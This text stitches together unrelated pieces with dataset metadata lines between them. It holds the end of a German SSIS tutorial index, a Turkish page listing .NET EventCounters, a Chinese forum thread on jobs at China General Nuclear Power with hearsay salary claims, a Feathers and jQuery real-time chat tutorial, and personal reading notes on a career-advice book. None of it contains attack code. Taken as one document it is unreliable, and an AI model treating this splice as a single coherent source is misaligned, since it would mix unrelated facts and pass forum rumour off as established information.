[Anforderungen für Lektion 1](../integration-services/lesson-1-create-a-project-and-basic-package-with-ssis.md#prerequisites) vertraut. ## <a name="lesson-tasks"></a>Aufgaben der Lektion Diese Lektion enthält die folgenden Aufgaben: - [Schritt 1: Kopieren des Pakets aus Lektion 4](../integration-services/lesson-5-1-copying-the-lesson-4-package.md) - [Schritt 2: Aktivieren und Konfigurieren von Paketkonfigurationen](../integration-services/lesson-5-2-enabling-and-configuring-package-configurations.md) - [Schritt 3: Ändern des Directory-Eigenschaftskonfigurationswerts](../integration-services/lesson-5-3-modifying-the-directory-property-configuration-value.md) - [Schritt 4: Testen des Pakets aus Lektion 5](../integration-services/lesson-5-4-testing-the-lesson-5-tutorial-package.md) ## <a name="start-the-lesson"></a>Lektion beginnen - [Schritt 1: Kopieren des Pakets aus Lektion 4](../integration-services/lesson-5-1-copying-the-lesson-4-package.md)
61.016129
761
0.792228
deu_Latn
0.959938
539cc8f948296c57f02f1612934696e10c2a89e3
13,238
md
Markdown
docs/core/diagnostics/available-counters.md
yunuskorkmaz/docs.tr-tr
e73dea6e171ca23e56c399c55e586a61d5814601
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/core/diagnostics/available-counters.md
yunuskorkmaz/docs.tr-tr
e73dea6e171ca23e56c399c55e586a61d5814601
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/core/diagnostics/available-counters.md
yunuskorkmaz/docs.tr-tr
e73dea6e171ca23e56c399c55e586a61d5814601
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: .NET 'teki iyi bilinen EventCounters description: .NET çalışma zamanı ve kitaplıkları tarafından yayınlanan EventCounters 'i gözden geçirin. ms.topic: reference ms.date: 12/17/2020 ms.openlocfilehash: aad4fa8b33ebf0dcb7803c77b11fb99a6b6d7b83 ms.sourcegitcommit: c7f0beaa2bd66ebca86362ca17d673f7e8256ca6 ms.translationtype: MT ms.contentlocale: tr-TR ms.lasthandoff: 03/23/2021 ms.locfileid: "104872840" --- # <a name="well-known-eventcounters-in-net"></a>.NET 'teki iyi bilinen EventCounters .NET çalışma zamanı ve kitaplıkları, [`EventCounter`](./event-counters.md) çeşitli performans sorunlarını tanımlamak ve tanılamak için kullanılabilecek birkaç tane uygular ve yayımlar. Bu belge, sağlayıcıları ve açıklamalarını izlemek için kullanılabilecek bir başvurudur `EventCounters` . ## <a name="systemruntime-counters"></a>System. Runtime sayaçları Aşağıdaki sayaçlar .NET çalışma zamanının (CoreCLR) bir parçası olarak yayımlanır ve içinde tutulur [`RuntimeEventSource.cs`](https://github.com/dotnet/runtime/blob/main/src/libraries/System.Private.CoreLib/src/System/Diagnostics/Tracing/RuntimeEventSource.cs) . | Sayaç | Açıklama | |--|--| | :::no-loc text="% Time in GC since last GC"::: (`time-in-gc`) | Son GC 'den bu yana GC 'deki sürenin yüzdesi | | :::no-loc text="Allocation Rate"::: (`alloc-rate`) | Her güncelleştirme aralığı için ayrılan bayt sayısı | | :::no-loc text="CPU Usage"::: (`cpu-usage`) | İşlemin CPU kullanımının tüm sistem CPU kaynaklarıyla ilişkili yüzdesi | | :::no-loc text="Exception Count"::: (`exception-count`) | Oluşan özel durumların sayısı | | :::no-loc text="GC Heap Size"::: (`gc-heap-size`) | Temel alınarak ayrılan bayt sayısı <xref:System.GC.GetTotalMemory(System.Boolean)?displayProperty=nameWithType> | | :::no-loc text="Gen 0 GC Count"::: (`gen-0-gc-count`) | Güncelleştirme aralığı başına Gen 0 için GC 'nin kaç kez gerçekleştiği | | :::no-loc text="Gen 0 Size"::: (`gen-0-size`) | Gen 0 GC için bayt sayısı | | :::no-loc text="Gen 1 GC Count"::: (`gen-1-gc-count`) | Her güncelleştirme aralığı için Gen 1 için GC oluşma sayısı | | :::no-loc text="Gen 1 Size"::: (`gen-1-size`) | Gen 1 GC için bayt sayısı | | :::no-loc text="Gen 2 GC Count"::: (`gen-2-gc-count`) | Her güncelleştirme aralığı için Gen 2 için GC 'nin kaç kez gerçekleştiği | | :::no-loc text="Gen 2 Size"::: (`gen-2-size`) | Gen 2 GC için bayt sayısı | | :::no-loc text="LOH Size"::: (`loh-size`) | Büyük nesne yığını için bayt sayısı | | :::no-loc text="POH Size"::: (`poh-size`) | Sabitlenmiş nesne yığını için bayt sayısı (.NET 5 ve sonraki sürümlerinde kullanılabilir) | | :::no-loc text="GC Fragmentation"::: (`gc-fragmentation`) | GC yığın parçalanması (.NET 5 ve sonraki sürümlerde kullanılabilir) | | :::no-loc text="Monitor Lock Contention Count"::: (`monitor-lock-contention-count`) | Monitöre göre izleyicinin kilidini almaya çalışırken çekişmenin sayısı <xref:System.Threading.Monitor.LockContentionCount?displayProperty=nameWithType> | | :::no-loc text="Number of Active Timers"::: (`active-timer-count`) | <xref:System.Threading.Timer>Şu anda etkin olan örneklerin sayısı<xref:System.Threading.Timer.ActiveCount?displayProperty=nameWithType> | | :::no-loc text="Number of Assemblies Loaded"::: (`assembly-count`) | <xref:System.Reflection.Assembly>Bir zaman noktasındaki bir işleme yüklenen örnek sayısı | | :::no-loc text="ThreadPool Completed Work Item Count"::: (`threadpool-completed-items-count`) | Şu ana kadar işlenen iş öğelerinin sayısı <xref:System.Threading.ThreadPool> | | :::no-loc text="ThreadPool Queue Length"::: (`threadpool-queue-length`) | Şu anda içinde işlenmek üzere sıraya alınan iş öğelerinin sayısı <xref:System.Threading.ThreadPool> | | :::no-loc text="ThreadPool Thread Count"::: (`threadpool-thread-count`) | Üzerinde şu anda mevcut olan iş parçacığı havuzu iş parçacıklarının sayısı <xref:System.Threading.ThreadPool><xref:System.Threading.ThreadPool.ThreadCount?displayProperty=nameWithType> | | :::no-loc text="Working Set"::: (`working-set`) | Zaman tabanında bir noktada işlem bağlamına eşlenen fiziksel bellek miktarı <xref:System.Environment.WorkingSet?displayProperty=nameWithType> | | :::no-loc text="IL Bytes Jitted"::: (`il-bytes-jitted`) | JıT olarak derlenen ve bayt cinsinden (.NET 5 ve sonraki sürümlerde kullanılabilir) Toplam ILS boyutu | | :::no-loc text="Method Jitted Count"::: (`method-jitted-count`) | JıT olarak derlenen yöntemlerin sayısı (.NET 5 ve sonraki sürümlerinde kullanılabilir) | ## <a name="microsoftaspnetcorehosting-counters"></a>"Microsoft. AspNetCore. Hosting" sayaçları Aşağıdaki sayaçlar [ASP.NET Core](/aspnet/core) bir parçası olarak yayımlanır ve içinde tutulur [`HostingEventSource.cs`](https://github.com/dotnet/aspnetcore/blob/main/src/Hosting/Hosting/src/Internal/HostingEventSource.cs) . | Sayaç | Açıklama | |--|--| | :::no-loc text="Current Requests"::: (`current-requests`) | Başlatılmış ancak henüz durdurulmamış isteklerin toplam sayısı | | :::no-loc text="Failed Requests"::: (`failed-requests`) | Uygulamanın ömrü boyunca oluşan başarısız isteklerin toplam sayısı | | :::no-loc text="Request Rate"::: (`requests-per-second`) | Güncelleştirme aralığı başına oluşan isteklerin sayısı | | :::no-loc text="Total Requests"::: (`total-requests`) | Uygulamanın ömrü boyunca oluşan isteklerin toplam sayısı | ## <a name="microsoftaspnetcorehttpconnections-counters"></a>"Microsoft. AspNetCore. http. Connections" sayaçları Aşağıdaki sayaçlar [ASP.NET Core SignalR](/aspnet/core/signalr/introduction) 'nin bir parçası olarak yayımlanır ve içinde tutulur [`HttpConnectionsEventSource.cs`](https://github.com/dotnet/aspnetcore/blob/main/src/SignalR/common/Http.Connections/src/Internal/HttpConnectionsEventSource.cs) . | Sayaç | Açıklama | |--|--| | :::no-loc text="Average Connection Duration"::: (`connections-duration`) | Bir bağlantının ortalama süresi (milisaniye cinsinden) | | :::no-loc text="Current Connections"::: (`current-connections`) | Başlatılmış ancak henüz durdurulmamış etkin bağlantı sayısı | | :::no-loc text="Total Connections Started"::: (`connections-started`) | Başlatılan toplam bağlantı sayısı | | :::no-loc text="Total Connections Stopped"::: (`connections-stopped`) | Durdurulan toplam bağlantı sayısı | | :::no-loc text="Total Connections Timed Out"::: (`connections-timed-out`) | Zaman aşımına uğrayan toplam bağlantı sayısı | ## <a name="microsoft-aspnetcore-server-kestrel-counters"></a>"Microsoft-AspNetCore-Server-Kestrel" sayaçları Aşağıdaki sayaçlar [ASP.NET Core Kestrel Web sunucusunun](/aspnet/core/fundamentals/servers/kestrel) bir parçası olarak yayımlanır ve içinde tutulur [`KestrelEventSource.cs`](https://github.com/dotnet/aspnetcore/blob/main/src/Servers/Kestrel/Core/src/Internal/Infrastructure/KestrelEventSource.cs) . | Sayaç | Açıklama | |--|--| | :::no-loc text="Connection Queue Length"::: (`connection-queue-length`) | Bağlantı sırasının geçerli uzunluğu | | :::no-loc text="Connection Rate"::: (`connections-per-second`) | Web sunucusuna güncelleştirme aralığı başına bağlantı sayısı | | :::no-loc text="Current Connections"::: (`current-connections`) | Web sunucusuna etkin bağlantıların geçerli sayısı | | :::no-loc text="Current TLS Handshakes"::: (`current-tls-handshakes`) | Geçerli TLS el sıkışma sayısı | | :::no-loc text="Current Upgraded Requests (WebSockets)"::: (`current-upgraded-requests`) | Yükseltilen isteklerin geçerli sayısı (WebSockets) | | :::no-loc text="Failed TLS Handshakes"::: (`failed-tls-handshakes`) | Toplam başarısız TLS el sıkışmaları sayısı | | :::no-loc text="Request Queue Length"::: (`request-queue-length`) | İstek sırasının geçerli uzunluğu | | :::no-loc text="TLS Handshake Rate"::: (`tls-handshakes-per-second`) | Güncelleştirme aralığı başına TLS el sıkışma sayısı | | :::no-loc text="Total Connections"::: (`total-connections`) | Web sunucusuna yönelik toplam bağlantı sayısı | | :::no-loc text="Total TLS Handshakes"::: (`total-tls-handshakes`) | Web sunucusu ile toplam TLS el sıkışma sayısı | ## <a name="systemnethttp-counters"></a>"System .net. http" sayaçları Aşağıdaki sayaçlar HTTP yığını tarafından yayımlanır. Bu sayaçlar yalnızca .NET 5 ve sonraki sürümlerde kullanılabilir. | Sayaç | Açıklama | |--|--| | :::no-loc text="Requests Started"::: (`requests-started`) | İşlemin başlatılmasından bu yana başlatılan istek sayısı | | :::no-loc text="Requests Started Rate"::: (`requests-started-rate`) | Güncelleştirme aralığı başına başlatılan istek sayısı | | :::no-loc text="Requests Failed"::: (`requests-failed`) | İşlemin başlatılmasından bu yana başarısız olan istek sayısı | | :::no-loc text="Requests Failed Rate"::: (`requests-failed-rate`) | Güncelleştirme aralığı başına başarısız istek sayısı | | :::no-loc text="Current Requests"::: (`current-requests`) | Başlatılmış ancak henüz tamamlanmamış veya başarısız olan etkin HTTP isteklerinin geçerli sayısı | | :::no-loc text="Current HTTP 1.1 Connections"::: (`http11-connections-current-total`) | Başlatılmış ancak henüz tamamlanmamış veya başarısız olan HTTP 1,1 bağlantılarının geçerli sayısı | | :::no-loc text="Current HTTP 2.0 Connections"::: (`http20-connections-current-total`) | Başlatılmış ancak henüz tamamlanmamış veya başarısız olan HTTP 2,0 bağlantılarının geçerli sayısı | | :::no-loc text="HTTP 1.1 Requests Queue Duration"::: (`http11-requests-queue-duration`) | İstek kuyruğunda harcanan HTTP 1,1 isteklerinin ortalama süresi | | :::no-loc text="HTTP 2.0 Requests Queue Duration"::: (`http20-requests-queue-duration`) | İstek kuyruğunda harcanan HTTP 2,0 isteklerinin ortalama süresi | ## <a name="systemnetnameresolution-counters"></a>"System .net. NameResolution" sayaçları Aşağıdaki sayaçlar DNS aramalarıyla ilgili ölçümleri izler. Bu sayaçlar yalnızca .NET 5 ve sonraki sürümlerde kullanılabilir. | Sayaç | Açıklama | |--|--| | :::no-loc text="DNS Lookups Requested"::: (`dns-lookups-requested`) | İşlemin başlatılmasından bu yana istenen DNS arama sayısı | | :::no-loc text="Average DNS Lookup Duration"::: (`dns-lookups-duration`) | Bir DNS araması için geçen ortalama süre | ## <a name="systemnetsecurity-counters"></a>"System .net. Security" sayaçları Aşağıdaki sayaçlar, aktarım katmanı güvenlik protokolü ile ilgili ölçümleri izler. Bu sayaçlar yalnızca .NET 5 ve sonraki sürümlerde kullanılabilir. | Sayaç | Açıklama | |--|--| | :::no-loc text="TLS handshakes completed"::: (`tls-handshake-rate`) | Güncelleştirme aralığı başına tamamlanan TLS el sıkışmaları sayısı | | :::no-loc text="Total TLS handshakes completed"::: (`total-tls-handshakes`) | İşlem başladıktan sonra tamamlanan TLS el sıkışmaları toplam sayısı | | :::no-loc text="Current TLS handshakes"::: (`current-tls-handshakes`) | Başlatılmış ancak henüz tamamlanmamış olan TLS el sıkışmalarının geçerli sayısı | | :::no-loc text="Total TLS handshakes failed"::: (`failed-tls-handshakes`) | İşlemin başlatılmasından bu yana başarısız olan TLS el sıkışmaları toplam sayısı | | :::no-loc text="All TLS Sessions Active"::: (`all-tls-sessions-open`) | Herhangi bir sürümdeki etkin TLS oturumlarının sayısı | | :::no-loc text="TLS 1.0 Sessions Active"::: (`tls10-sessions-open`) | Etkin TLS 1,0 oturumlarının sayısı | | :::no-loc text="TLS 1.1 Sessions Active"::: (`tls11-sessions-open`) | Etkin TLS 1,1 oturumlarının sayısı | | :::no-loc text="TLS 1.2 Sessions Active"::: (`tls12-sessions-open`) | Etkin TLS 1,2 oturumlarının sayısı | | :::no-loc text="TLS 1.3 Sessions Active"::: (`tls13-sessions-open`) | Etkin TLS 1,3 oturumlarının sayısı | | :::no-loc text="TLS Handshake Duration"::: (`all-tls-handshake-duration`) | Tüm TLS el sıkışmaları ortalama süresi | | :::no-loc text="TLS 1.0 Handshake Duration"::: (`tls10-handshake-duration`) | TLS 1,0 el sıkışmaları ortalama süresi | | :::no-loc text="TLS 1.1 Handshake Duration"::: (`tls11-handshake-duration`) | TLS 1,1 el sıkışmaları ortalama süresi | | :::no-loc text="TLS 1.2 Handshake Duration"::: (`tls12-handshake-duration`) | TLS 1,2 el sıkışmaları ortalama süresi | | :::no-loc text="TLS 1.3 Handshake Duration"::: (`tls13-handshake-duration`) | TLS 1,3 el sıkışmaları ortalama süresi | ## <a name="systemnetsockets-counters-available-on-net-5-and-later-versions"></a>"System .net. Sockets" sayaçları (.NET 5 ve sonraki sürümlerinde kullanılabilir) Aşağıdaki sayaçlar ile ilgili ölçümleri izler <xref:System.Net.Sockets.Socket> . | Sayaç | Açıklama | |--|--| | :::no-loc text="Outgoing Connections Established"::: (`outgoing-connections-established`) | İşlemin başlatılmasından bu yana kurulan giden bağlantıların toplam sayısı | | :::no-loc text="Incoming Connections Established"::: (`incoming-connections-established`) | İşlemin başlatılmasından bu yana kurulan gelen bağlantıların toplam sayısı | | :::no-loc text="Bytes Received"::: (`bytes-received`) | İşlemin başlatılmasından bu yana alınan toplam bayt sayısı | | :::no-loc text="Bytes Sent"::: (`bytes-sent`) | İşlemin başlatılmasından bu yana gönderilen toplam bayt sayısı | | :::no-loc text="Datagrams Received"::: (`datagrams-received`) | İşlemin başlatılmasından bu yana alınan toplam veri birimi sayısı | | :::no-loc text="Datagrams Sent"::: (`datagrams-sent`) | İşlemin başlatılmasından bu yana gönderilen toplam veri birimi sayısı |
91.296552
299
0.744297
tur_Latn
0.989942
539db9a84ebb42f8d1a1869fd331871c7ceeb16e
2,959
md
Markdown
_posts/2009-10-17-有没有人在核电系统工作.md
backup53/1984bbs
152406c37afab79176f0d094de5ac4cb0c780730
[ "MIT" ]
18
2020-01-02T21:43:02.000Z
2022-02-14T02:40:34.000Z
_posts/2009-10-17-有没有人在核电系统工作.md
wzxwj/1984bbs
152406c37afab79176f0d094de5ac4cb0c780730
[ "MIT" ]
3
2020-01-01T16:53:59.000Z
2020-01-05T10:14:11.000Z
_posts/2009-10-17-有没有人在核电系统工作.md
backup53/1984bbs
152406c37afab79176f0d094de5ac4cb0c780730
[ "MIT" ]
13
2020-01-20T14:27:39.000Z
2021-08-16T02:13:21.000Z
--- layout: default date: 2009-10-17 title: 有没有人在核电系统工作 categories: 罗马假日公寓 --- # 有没有人在核电系统工作 bizarr 想撞墙的鸡蛋~ 1楼 大 中 小 发表于 2009-10-17 19:45 只看该作者 有没有人在核电系统工作 有没有人在核电系统工作,本人最近找工作,可能要签核电部门,希望听到建议。 可以在这里问这种问题吧? --- [Terminusbot](https://github.com/TerminusBot) 整理,讨论请前往 [2049bbs.xyz](http://2049bbs.xyz/) --- a625446312 他为了他的未来,选择了死亡 2楼 大 中 小 发表于 2009-10-17 23:13 只看该作者 可以 我也贴了 但不是有钱得行业 目前还木找到 拎壶冲 3楼 大 中 小 发表于 2009-10-17 23:20 只看该作者 去哪?中广核 还是中核, 广核了解多些 好些师兄在那边 智障大师Elsker 三民主义,吾党所宗 4楼 大 中 小 发表于 2009-10-18 12:15 只看该作者 我了解一点 核专业的,中广核 蚊驱 5楼 大 中 小 发表于 2009-10-18 20:06 只看该作者 去问下辛普森。 bizarr 想撞墙的鸡蛋~ 6楼 大 中 小 发表于 2009-10-19 09:46 只看该作者 谁是辛普森? 我问的就是中广核……可能这周就要签……各位过来人给个建议…… jiucaibao 草泥马——为把马勒戈壁建设成草泥马戈壁而努力奋斗 7楼 大 中 小 发表于 2009-10-19 10:20 只看该作者 你是学什么的?去中广核下面哪个公司? 我感觉你如果在找工作中竞争力比较强,而且属于比较有进取心的,那去广核没什么意思。起薪虽然比周围同学高,但过3~5年基本就差不多了。以后同学中混得好的会超过你越来越多。而你升职空间很小,因为各种原因也很难跳出这个圈子。 如果你喜欢稳定的生活,而且可以适应国企的那种氛围和工作方式,那广核还不错。生活稳定,待遇还不错,大亚湾环境也很好。 Phillip 路边社特邀围观群众 8楼 大 中 小 发表于 2009-10-19 10:43 只看该作者 中广核... 去听过他们招聘宣讲会. 感觉那地方招的就是螺丝钉型的人物, 不太适合爱折腾有野心的人. a84809 9楼 大 中 小 发表于 2009-10-19 12:52 只看该作者 楼主是去核电部门工作 还是直接去核电站工作 这可是两码事 如果直接下核电站的话 建议生完孩子再去 raul1943 柔软时光 10楼 大 中 小 发表于 2009-10-19 15:17 只看该作者 据说中广核的待遇很不错,年薪20万左右。。。。 jiucaibao 草泥马——为把马勒戈壁建设成草泥马戈壁而努力奋斗 11楼 大 中 小 发表于 2009-10-19 15:29 只看该作者 回复 10楼 raul1943 的话题 又是据说帖。 我说个靠谱的吧 本科毕业没有工作经验的,工作一年转正后,每年所有收入税后约8万多。 [ 本帖最后由 baozi_sjz 于 2009-10-19 15:33 编辑 ] 躲猫猫粉丝 12楼 大 中 小 发表于 2009-10-19 23:09 只看该作者 引用: > 原帖由 baozi_sjz 于 2009-10-19 15:29 发表 > ![](https://1984bbs.com/images/common/back.gif) > 又是据说帖。 > 我说个靠谱的吧 > 本科毕业没有工作经验的,工作一年转正后,每年所有收入税后约8万多。 靠谱 这是广核承诺的待遇 ucpipol 摘绿豆 13楼 大 中 小 发表于 2009-10-19 23:24 只看该作者 中广核工资福利待遇不错,我有好几个同学在核电工作,不辛苦,钱还多。就是生活区偏僻些, 拎壶冲 14楼 大 中 小 发表于 2009-10-19 23:26 只看该作者 现在进广核不一定就在广东,它在全国有好几个项目 所以有可能去大连 江苏什么的 如果你做工程的话 skyking0752 15楼 大 中 小 发表于 2009-10-19 23:28 只看该作者 大亚湾?难道就是我这个地方的中广核?? 那待遇好得不得了,每个月光发购物卡一个都2000,工资什么就不讲了,几乎人人以车代步,当然,也有相对贫困的,不错啦 阴影之剑 16楼 大 中 小 发表于 2009-10-21 12:36 只看该作者 小心阳痿~~~~~~~ bizarr 想撞墙的鸡蛋~ 17楼 大 中 小 发表于 2009-10-21 19:11 只看该作者 唉,签的时候才说是必须去福建宁德。放弃了。 左岸←右岸 把你的子宫钉到我的墙上,这样我便会记得你。我们必须走了。明天,明天… 18楼 大 中 小 发表于 2009-10-25 00:56 只看该作者 引用: > 原帖由 bizarr 于 2009-10-21 19:11 发表 > ![](https://1984bbs.com/images/common/back.gif) > 唉,签的时候才说是必须去福建宁德。放弃了。 宁德不错的·····我去过···· 海湾景色不错···· 只是可能哪里的官场什么的黑了点
5.032313
110
0.583981
yue_Hant
0.98673
539e38be459672bce80e30eb3e6f1b4433e9b1e5
7,969
md
Markdown
frameworks/jquery.md
ajmeyghani/feathers-docs
fdd249ea443d3bb7fb2b2db504314043c2f5d0ca
[ "MIT" ]
8
2018-06-12T10:39:02.000Z
2020-08-08T14:36:14.000Z
frameworks/jquery.md
ajmeyghani/feathers-docs
fdd249ea443d3bb7fb2b2db504314043c2f5d0ca
[ "MIT" ]
null
null
null
frameworks/jquery.md
ajmeyghani/feathers-docs
fdd249ea443d3bb7fb2b2db504314043c2f5d0ca
[ "MIT" ]
6
2017-02-06T11:43:43.000Z
2020-11-14T18:42:19.000Z
# Feathers + jQuery You don't always need a full on framework. Feathers and the [Feathers client](../clients/feathers.md) also work great to add real-time capability to a vanilla JavaScript or [jQuery](http://jquery.com/) application. In this guide we will create a jQuery front-end for the chat API built in the [Your First App](../getting-started/readme.md) section. If you haven't done so you'll want to go through that tutorial or you can find a [working example here](https://github.com/feathersjs/feathers-chat). > **ProTip:** This guide uses ES6 syntax which is only available in newer browsers and IE edge. If you want to use the app in older browsers you need to include a transpiler like [Babel](https://babeljs.io/). ## Setting up the HTML page The first step is getting the HTML skeleton for the chat application up. You can do so by pasting the following HTML into `public/chat.html` (which is the page the guide app redirects to after a successful login): ```html <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=0" /> <title>Feathers Chat</title> <link rel="shortcut icon" href="favicon.ico"> <link rel="stylesheet" href="//cdn.rawgit.com/feathersjs/feathers-chat/v0.1.0/public/base.css"> <link rel="stylesheet" href="//cdn.rawgit.com/feathersjs/feathers-chat/v0.1.0/public/chat.css"> </head> <body> <div id="app" class="flex flex-column"> <header class="title-bar flex flex-row flex-center"> <div class="title-wrapper block center-element"> <img class="logo" src="http://feathersjs.com/img/feathers-logo-wide.png" alt="Feathers Logo"> <span class="title">Chat</span> </div> </header> <div class="flex flex-row flex-1 clear"> <aside class="sidebar col col-3 flex flex-column flex-space-between"> <header class="flex flex-row flex-center"> <h4 class="font-300 text-center"> <span class="font-600 online-count">0</span> users </h4> </header> <ul class="flex flex-column flex-1 list-unstyled user-list"></ul> <footer class="flex flex-row flex-center"> <a href="/login.html" class="logout button button-primary"> Sign Out </a> </footer> </aside> <div class="flex flex-column col col-9"> <main class="chat flex flex-column flex-1 clear"></main> <form class="flex flex-row flex-space-between" id="send-message"> <input type="text" name="text" class="flex flex-1"> <button class="button-primary" type="submit">Send</button> </form> </div> </div> </div> <script src="//cdnjs.cloudflare.com/ajax/libs/babel-core/5.8.23/browser.min.js"></script> <script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.12.0/moment.js"></script> <script src="//code.jquery.com/jquery-2.2.1.js"></script> <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/core-js/2.1.4/core.min.js"></script> <script src="//npmcdn.com/feathers-client@^1.0.0/dist/feathers.js"> </script> <script src="/socket.io/socket.io.js"></script> <script type="text/babel" src="app.js"></script> </body> </html> ``` This sets everything up we need including some styles, the Feathers client, jQuery and [MomentJS](http://momentjs.com/) (to format dates). ## jQuery code Our chat functionality will live in `public/app.js`. First, let's create some functions that use jQuery (and [ES6 strings](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals)) to render a single user and message: ```js 'use strict'; // A placeholder image if the user does not have one const PLACEHOLDER = 'https://placeimg.com/60/60/people'; // An anonymous user if the message does not have that information const dummyUser = { image: PLACEHOLDER, email: 'Anonymous' }; // The total number of users let userCount = 0; function addUser(user) { // Update the number of users $('.online-count').html(++userCount); // Add the user to the list $('.user-list').append(`<li> <a class="block relative" href="#"> <img src="${user.avatar || PLACEHOLDER}" alt="" class="avatar"> <span class="absolute username">${user.email}</span> </a> </li>`); } // Renders a new message and finds the user that belongs to the message function addMessage(message) { // Find the user belonging to this message or use the anonymous user if not found const sender = message.sentBy || dummyUser; const chat = $('.chat'); chat.append(`<div class="message flex flex-row"> <img src="${sender.avatar || PLACEHOLDER}" alt="${sender.email}" class="avatar"> <div class="message-wrapper"> <p class="message-header"> <span class="username font-600">${sender.email}</span> <span class="sent-date font-300">${moment(message.createdAt).format('MMM Do, hh:mm:ss')}</span> </p> <p class="message-content font-300">${message.text}</p> </div> </div>`); chat.scrollTop(chat[0].scrollHeight - chat[0].clientHeight); } ``` Now we can set up the Feathers client. Because we also want real-time we will use a [Socket.io](../clients/socket-io.md) connection: ```js // Establish a Socket.io connection const socket = io(); // Initialize our Feathers client application through Socket.io // with hooks and authentication. const app = feathers() .configure(feathers.socketio(socket)) .configure(feathers.hooks()) // Use localStorage to store our login token .configure(feathers.authentication({ storage: window.localStorage })); // Get the Feathers services we want to use const userService = app.service('users'); const messageService = app.service('messages'); ``` Next, we set up event handlers for logout and when someone submits the message form: ```js $('#send-message').on('submit', function(ev) { // This is the message text input field const input = $(this).find('[name="text"]'); // Create a new message and then clear the input field messageService.create({ text: input.val() }).then(message => input.val('')); ev.preventDefault(); }); $('.logout').on('click', function() { app.logout().then(() => window.location.href = '/index.html'); }); ``` When submitting the form, we create a new message with the text from the input field. When clicking the logout button we will call `app.logout()` and then redirect back to the login page. The chat application is set up to redirect from `login.html` to our `chat.html` page on successful login. This means that we already know what user is logged in so we just have to call [app.authenticate](../authentication/client.md) to authenticate that user (and redirect back to the login page if it fails). Then we retrieve the 25 newest messages, all the users and listen to events to make real-time updates: ```js app.authenticate().then(() => { // Find the latest 10 messages. They will come with the newest first // which is why we have to reverse before adding them messageService.find({ query: { $sort: { createdAt: -1 }, $limit: 25 } }).then(page => page.data.reverse().forEach(addMessage)); // Listen to created events and add the new message in real-time messageService.on('created', addMessage); // Find all users userService.find().then(page => { const users = page.data; // Add every user to the list users.forEach(addUser); }); // We will also see when new users get created in real-time userService.on('created', addUser); }) // On unauthorized errors we just redirect back to the login page .catch(error => { if(error.code === 401) { window.location.href = '/login.html' } }); ``` That's it. We now have a real-time chat application front-end built in jQuery.
39.063725
412
0.672355
eng_Latn
0.888963
539eafd07c706a5cedcdcd28e82c8a53b6cbd367
55
md
Markdown
README.md
roisinanglim/numpy-random
b97202e5ba154f1dd6f846e237964fc6348281cc
[ "MIT" ]
null
null
null
README.md
roisinanglim/numpy-random
b97202e5ba154f1dd6f846e237964fc6348281cc
[ "MIT" ]
null
null
null
README.md
roisinanglim/numpy-random
b97202e5ba154f1dd6f846e237964fc6348281cc
[ "MIT" ]
null
null
null
# numpy-random Investigation into numpy.random package
18.333333
39
0.836364
eng_Latn
0.397667
539edf21cb3d58be1d468fca05b71c992babfd81
144
md
Markdown
__internal/release-notes/components/menus/RELEASENOTES.md
jshockley99/map-anywhere
c7a05306e5e5514735d136a11daa8a6195bbfca9
[ "BSD-3-Clause" ]
null
null
null
__internal/release-notes/components/menus/RELEASENOTES.md
jshockley99/map-anywhere
c7a05306e5e5514735d136a11daa8a6195bbfca9
[ "BSD-3-Clause" ]
null
null
null
__internal/release-notes/components/menus/RELEASENOTES.md
jshockley99/map-anywhere
c7a05306e5e5514735d136a11daa8a6195bbfca9
[ "BSD-3-Clause" ]
null
null
null
<!-- Release notes authoring guidelines: http://keepachangelog.com/ --> # Menus Release Notes <!-- ## [Unreleased] --> <!-- ## [VERSION] -->
18
71
0.597222
kor_Hang
0.515532
539f0ab8511269fe9a96b09a06543e3d8e47e810
3,530
md
Markdown
_drafts/pips/Nice Girls Don't Get the Corner Office by Lois P. Frankel.md
soujanyachan/soujanyachan.github.io
5ff512c82a8028ea0cd15e9b4fc852e22316594a
[ "MIT" ]
null
null
null
_drafts/pips/Nice Girls Don't Get the Corner Office by Lois P. Frankel.md
soujanyachan/soujanyachan.github.io
5ff512c82a8028ea0cd15e9b4fc852e22316594a
[ "MIT" ]
null
null
null
_drafts/pips/Nice Girls Don't Get the Corner Office by Lois P. Frankel.md
soujanyachan/soujanyachan.github.io
5ff512c82a8028ea0cd15e9b4fc852e22316594a
[ "MIT" ]
null
null
null
[[book_notes]] #book Title:: Authors:: Category:: Kind:: Subject:: #book # Read the preface, contents, index. What do you expect the book to be about ? What is the problem the author is trying to solve? - identify the keywords and how they are used by the author - focus on the questions that you want answered - define the answers given by the book # What is the structure of the book? # The Book in 3 Sentences (Summary) # Insights # Glitches - Disagreements with author # Holes - missing from the book? # Who Should Read It? # Takeaways - How the Book Changed Me # My Rating: # Snippets From early childhood, girls are taught that their well-being and ultimate success is contingent upon acting in certain stereotypical ways, such as being polite, soft-spoken, compliant, and relationship-oriented. Attempts to act counter to this socialized role are met with ridicule, disapproval, and scorn. You don’t have to act in ways you were taught. You have choices. Grow into your role as a leader. Rationalizing, defending, and bemoaning won’t get us where we want to be. They become excuses for staying where we are. Those who have power don’t really want to share it, so they minimize the need for others to share it. Behaviors that were appropriate in girlhood, but not in womanhood, may be contributing to your career’s stagnating, plateauing, or even derailing from its career path. Girls don’t have to take responsibility for their destiny. Their choices are limited by a narrowly defined scope of expectations. We can’t see beyond the boundaries that have traditionally circumscribed the parameters of our influence. It’s dangerous to go out of bounds. What does it really mean to live our lives as girls rather than women? It means we choose behaviors consistent with those that are expected of us rather than those that move us toward fulfillment and self-actualization. You’ve been socialized well, and it’s probably not helping you to achieve your career goals. Pay close attention to those questions on which you rated yourself a 1—you’re dangerously close to sabotaging your career. women reject the notion of being perceived as too masculine, aggressive, or uncooperative out of fear. It is so counter to our socialization that we dismiss it out of hand. The notion that we must be for others rather than for ourselves is implanted so strongly that we are reluctant to explore the alternative. We’ve learned to be less direct so we will not be perceived as taking too much power away from men. With each assertion we frequently feel guilty. We equate taking control back with taking something away from someone else. Give yourself permission to move from girlhood to womanhood. Visualize yourself as you want to be. Talk back to the fearful voice inside your head. Surround yourself with a Plexiglas shield. twenty-five-word vision statement of how they want to be described, then list the behaviors needed to get them there. When you find others resisting your efforts to be more direct and empowered, consider first that their responses are designed to keep you in a less 